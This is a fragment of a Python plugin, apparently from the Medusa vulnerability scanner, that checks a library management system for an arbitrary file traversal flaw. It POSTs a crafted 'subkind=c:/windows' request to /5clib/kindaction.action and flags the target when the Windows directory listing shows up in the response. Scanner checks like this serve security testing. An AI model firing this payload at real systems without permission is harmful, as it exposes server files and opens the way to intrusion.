        exceptions are caught and logged.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Default port by scheme; stays None for any other scheme.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/5clib/kindaction.action"
        data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1"
        payload_url = "{}://{}:{}{}".format(scheme, url, str(port), payload)
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # verify=False: the server certificate is not validated.
        resp = session.post(payload_url,
                            data=data,
                            headers=headers,
                            proxies=proxies,
                            timeout=6,
                            verify=False)
        con = resp.text
        # NOTE(review): a single file name is the only content indicator, so
        # any 200 page that mentions 'system.ini' also matches — confirm hits.
        if resp.status_code == 200 and 'system.ini' in con:
            Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding for this URL.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()
            # Write the result to a file named after the target URL.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the URL together with the name of the failing plugin.
        ClassCongregation.ErrorLog().Write(url, plugin_name)